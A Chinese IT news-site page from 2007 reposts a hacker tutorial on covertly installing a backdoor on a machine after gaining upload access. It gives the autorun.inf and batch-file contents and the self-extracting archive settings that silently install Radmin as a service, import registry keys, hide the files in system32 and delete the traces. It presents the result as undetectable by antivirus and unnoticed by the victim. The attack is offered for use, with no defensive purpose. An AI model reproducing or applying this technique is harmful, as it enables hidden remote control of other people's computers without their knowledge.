IT运维管理,创造商业价值!
中国IT运维网首页 | 资讯中心 | 运维管理 | 信息安全 | CIO视界 | 云计算 | 最佳案例 | 运维资源 | 专题策划 | 知识库 | 论坛

黑客入侵网站后全自动安装后门

2007年01月19日
/

这里只需要你有上传的权限。

一共三个文件:1.Autorun.inf、2.Shell.bat、3.Hao.exe(自解压文件)。

思路:

全部放在C盘下。当肉鸡主人双击C盘时自动运行第一文件,第一文件带动运行第二文件,同时第二运行第三运行完可正常进入C盘。不会让人发觉。并且里面所带的批处理,会在最后把所有文件删除。此时,后门却已经装上去了(此法针对没有权限运行木马的入侵活动)。

制作:

[autorun] open=shell.bat,这个是autorun.inf @echo off hao.exe c:\windows\explorer c:\ del autorun.inf del rad.exe del shell.ba,这个是shell.bat hao.exe,里面包含admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五个文件(关键所在)r.bat——批处理做法 @echo off @pchealthy.exe /install /silence @regedit /s admin.reg @net start r_server @del admin.reg @del r.bat,其他四个就是Radmin的文件。这个大家都会,复制过来就行。

我们再来看自解压的处理。在解压路径里我们用 %systemroot%\system32,就是解压到系统目录里,并且“解压后运行”填上我们的r.bat文件。因为这里的文件比较多,比较隐蔽。解压模式我们选 “全部隐藏”,和 “覆盖所有文件”! 好了,一个不被杀毒软件所能查杀的好后门程序就成功制作出来了!

大家不要放在文件夹里压缩哦,要直接选上admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五个文件压缩,这样就行啦。

责任编辑: 雪花(TEL:(010)68476636-8008)

发表评论请到:http://bbs.cnitom.com

相关阅读

图文热点

Power架构产品创新 IBM推动其本土化发展
Power架构产品创新 IBM推动其本土化发展自从1990年,IBM推出基于RISC系统的新产品线RS/6000(现称eServer p系列)之后,...
WAF:高校Web应用安全守护者
WAF:高校Web应用安全守护者最近几年高校网站被攻击的事件时有发生,造成了不良影响,因此越来越多的高校开始...

本类热点